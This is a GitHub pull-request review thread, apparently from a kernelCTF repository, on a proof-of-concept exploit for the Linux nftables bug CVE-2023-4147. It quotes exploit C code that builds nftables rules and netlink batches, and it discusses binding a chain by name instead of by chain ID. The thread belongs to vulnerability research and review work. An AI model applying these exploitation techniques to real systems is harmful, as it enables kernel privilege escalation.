Add kernelCTF CVE-2023-4147_mitigation #111
Conversation
| memset(rule_data, 'b', 0x100); | ||
|
|
||
| nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_TABLE, table2_name); | ||
| nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_CHAIN, chain_victim2_name); |
There was a problem hiding this comment.
How do we add rule to the chain with NFT_CHAIN_BINDING flag without using chain ID (like in vulnerability) or like in rule_lookup_set1 and chain2_name?
There was a problem hiding this comment.
We can add a rule to the chain with NFT_CHAIN_BINDING set before it is bound by an immediate expr.
There was a problem hiding this comment.
Ok. Does that means that on the lines 279 - 300:
struct nftnl_rule * rule_bind_chain_1_2 = nftnl_rule_alloc();
nftnl_rule_set_str(rule_bind_chain_1_2, NFTNL_RULE_TABLE, table1_name);
nftnl_rule_set_str(rule_bind_chain_1_2, NFTNL_RULE_CHAIN, chain1_name);
struct nftnl_expr * expr_immediate = nftnl_expr_alloc("immediate");
nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain2_name);
nftnl_rule_add_expr(rule_bind_chain_1_2, expr_immediate);
struct nftnl_rule * rule_lookup_set1 = nftnl_rule_alloc();
nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_TABLE, table1_name);
// nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_CHAIN, chain2_name);
nftnl_rule_set_u32(rule_lookup_set1, NFTNL_RULE_CHAIN_ID, chain_id);
struct nftnl_expr * expr_lookup = nftnl_expr_alloc("lookup");
nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG32_00);
nftnl_expr_set_str(expr_lookup, NFTNL_EXPR_LOOKUP_SET, set1_name);
nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SET_ID, 1337);
nftnl_rule_add_expr(rule_lookup_set1, expr_lookup);
and the lines 561 - 567:
nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rule_bind_chain_1_2);
mnl_nlmsg_batch_next(batch);
nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rule_lookup_set1);
mnl_nlmsg_batch_next(batch);
we could change the logic of exploit to firstly add the rule_lookup_set1 to chain2_name and then add the expr_immediate to actually bind the chain? Based on your previous comment seems like this would allow us to skip adding by ID but use the Name instead. I see that there is a commented line there which attempts to do same thing that I just described... If it's not possible could you explain why?
There was a problem hiding this comment.
As you said, I think we can add a rule using the name by changing the order of the rules.
koczkatamas
force-pushed
the
master
branch
2 times, most recently
from
b2e2b9f
to
43a5a81
Compare
| @@ -0,0 +1,12 @@ | |||
| - Requirements: | |||
| - Capabilites: CAP_NET_ADMIN | |||
There was a problem hiding this comment.
I see that some of the comments from PR#112 could be applied to PR#111 as COS and Mitigation exploits are similar. For example here there is a small nit picking on Capabilites --> "Capabilities". Could you check recommendations on PR#112 and synchronise changes between PR#112 and PR111 please?
pocs/linux/kernelctf/CVE-2023-4147_mitigation/exploit/mitigation-6.1/exploit.c
Show resolved
Hide resolved
pocs/linux/kernelctf/CVE-2023-4147_mitigation/exploit/mitigation-6.1/exploit.c
Show resolved
Hide resolved
No description provided.